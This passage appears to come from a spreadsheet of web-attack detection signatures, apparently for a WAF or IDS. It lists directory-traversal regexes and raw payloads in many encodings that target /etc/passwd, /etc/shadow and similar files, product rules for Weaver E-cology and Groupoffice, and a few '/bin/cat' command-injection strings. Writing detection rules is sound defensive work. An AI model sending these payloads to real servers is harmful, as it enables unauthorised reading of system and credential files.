e%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|\.\.\.\.\\/\.\.\.\.\\/etc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|/%5C\.\./%5C\.\./%5C\.\./etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|\.\.\\/\.\.\\/\.\.\\/etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|%2e%2e%2f%2e%2e%2fetc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|\.\.\\\.\.\\etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|\.\.;/etc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|\.\./\.\./etc/passwd|\.\.\.\.//etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|\.\.\./\./etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|\.\.\\/etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|/etc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|%5c\.\.%5c\.\.%5c\.\./etc/passwd|\.\.\\etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%uff0e%uff0e%u2215etc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|%uff0e%uff0e%u2216etc/passwd|/%5C\.\./etc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|\.\.\.\.\\/etc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%252e%252e%252f%252e%252e%252fetc/passwd|\.\.\.\\\.\\etc/passwd|\.\.\\/\.\.\\/etc/passwd|\.\./\.\./\.\./etc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd).*</t>
  </si>
  <si>
    <t>%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|..\..\..\..\..\..\..\..\..\etc/passwd|../../../../../../../../etc/passwd|....//....//....//....//....//....//....//....//....//etc/passwd|..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd|../../../../../etc/passwd|%252e%252e%252f%252e%252e%252f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%c0%ae%c0%ae%c0%afetc/passwd|..;/..;/..;/etc/passwd|..;/..;/etc/passwd|..././..././..././..././..././..././..././..././..././..././..././etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|..\..\..\..\etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|../../../../../../../../../../etc/passwd|....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|%5c../etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|%2e%2e%2fetc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|..\..\..\..\..\..\etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|....//....//etc/passwd|%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd|....//....//....//....//....//....//....//....//....//....//etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|....\/....\/....\/etc/passwd|..././..././etc/passwd|/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd|%252e%252e%252fetc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd|..\..\..\etc/passwd|/%5C../%5C../etc/passwd|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etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|..;/..;/..;/..;/..;/..;/..;/etc/passwd|/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd|%5c..%5c..%5c..%5c../etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd|\etc/passwd|../etc/passwd|/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|../../../../etc/passwd|..;/..;/..;/..;/..;/..;/etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|...\.\...\.\etc/passwd|../../../../../../etc/passwd|....\/....\/....\/....\/etc/passwd|....//....//....//....//....//....//etc/passwd|%5c..%5c../etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|....\/....\/....\/....\/....\/etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd|..;/..;/..;/..;/..;/etc/passwd|/%5C../%5C../%5C../%5C../etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd|....\/....\/....\/....\/....\/....\/etc/passwd|....\/....\/....\/....\/....\/....\/....\/etc/passwd|..\..\..\..\..\..\..\..\..\..\..\etc/passwd|..\/..\/..\/..\/etc/passwd|%c0%ae%c0%ae%c0%afetc/passwd|....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|../../../../../../../../../etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|....\/....\/etc/passwd|..././..././..././..././..././..././..././etc/passwd|..\..\..\..\..\..\..\..\..\..\etc/passwd|...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd|/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd|..././..././..././..././..././..././..././..././etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|..././..././..././etc/passwd|...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|..\/..\/..\/..\/..\/etc/passwd|..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd|..;/..;/..;/..;/etc/passwd|%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd|/%5C../%5C../%5C../etc/passwd|....//....//....//....//....//....//....//etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd|..\..\..\..\..\etc/passwd|..\/..\/..\/etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|%2e%2e%2f%2e%2e%2fetc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|..\/..\/..\/..\/..\/..\/etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|....//....//....//etc/passwd|...\.\...\.\...\.\etc/passwd|...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd|..././..././..././..././..././..././..././..././..././..././etc/passwd|..\..\..\..\..\..\..\etc/passwd|....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd|..\..\etc/passwd|....//....//....//....//....//....//....//....//etc/passwd|..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd|..;/etc/passwd|%5c..%5c..%5c..%5c..%5c../etc/passwd|....//....//....//....//etc/passwd|....//....//....//....//....//etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|....//....//....//....//....//....//....//....//....//....//....//etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|..././..././..././..././..././..././..././..././..././etc/passwd|../../etc/passwd|....//etc/passwd|/%5C../%5C../%5C../%5C../%5C../etc/passwd|..././etc/passwd|..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd|...\.\...\.\...\.\...\.\etc/passwd|...\.\...\.\...\.\...\.\...\.\etc/passwd|..\/..\/..\/..\/..\/..\/..\/etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|..\/etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|..\..\..\..\..\..\..\..\etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|..././..././..././..././etc/passwd|/etc/passwd|..././..././..././..././..././..././etc/passwd|%5c..%5c..%5c../etc/passwd|..\etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|%uff0e%uff0e%u2215etc/passwd|..././..././..././..././..././etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd|/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd|../../../../../../../etc/passwd|/%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd|%uff0e%uff0e%u2216etc/passwd|/%5C../etc/passwd|%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd|....\/etc/passwd|%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%252e%252e%252f%252e%252e%252fetc/passwd|...\.\etc/passwd|..\/..\/etc/passwd|../../../etc/passwd|..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd</t>
  </si>
  <si>
    <t>泛微E-cology</t>
  </si>
  <si>
    <t>泛微E-cology_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/weaver/ln\.FileDownload\?fpath=\.\./ecology/WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>Groupoffice</t>
  </si>
  <si>
    <t>Groupoffice_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/compress\.php\?file=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/compress.php?file=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>Linux_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:/\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/shadow/image\?filename=\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|/%0a/bin/cat%20/etc/shadow|/static/\.\.%5c\.\.%5c\.\.%5cetc/passwd|%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00|/static/\.\.%5cetc/passwd\\\\/\.\./boot\.ini|//\&amp;apos;/bin/cat%20/etc/passwd//\&amp;apos;|/%00/etc/passwd%00|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\\./\./\./\./\./\./\./\./\./\./etc/shadow\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%0a/bin/cat%20/etc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts|//%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%25%5c\.\.%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\^\^\\\\%5c\.\.%5c\.\.%5cetc/passwd\\\\%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/hosts%00\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/passwd\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd|/%00/etc/shadow%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\^\^\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd%00\.jpg|/%00\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\\./\./\./\./\./\./\./\./\./\./etc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./%2A\\\\%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/shadow\\\\%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd|/image\?filename=\.\./\.\./\.\./etc/passwd|/static/\.\.%5c\.\.%5cetc/passwd|/static/\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow%00\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd\^\^\\\\%5c\.\.%5c\.\.%5c\.\.%5cetc/passwd\\\\%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./\.\.%c0%af\.\./etc/passwd\\\\/\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/shadow\\\\\./\./\./\./\./\./\./\./\./\./etc/passwd|/%0a/bin/cat%20/etc/passwd|//\&amp;apos;/bin/cat%20/etc/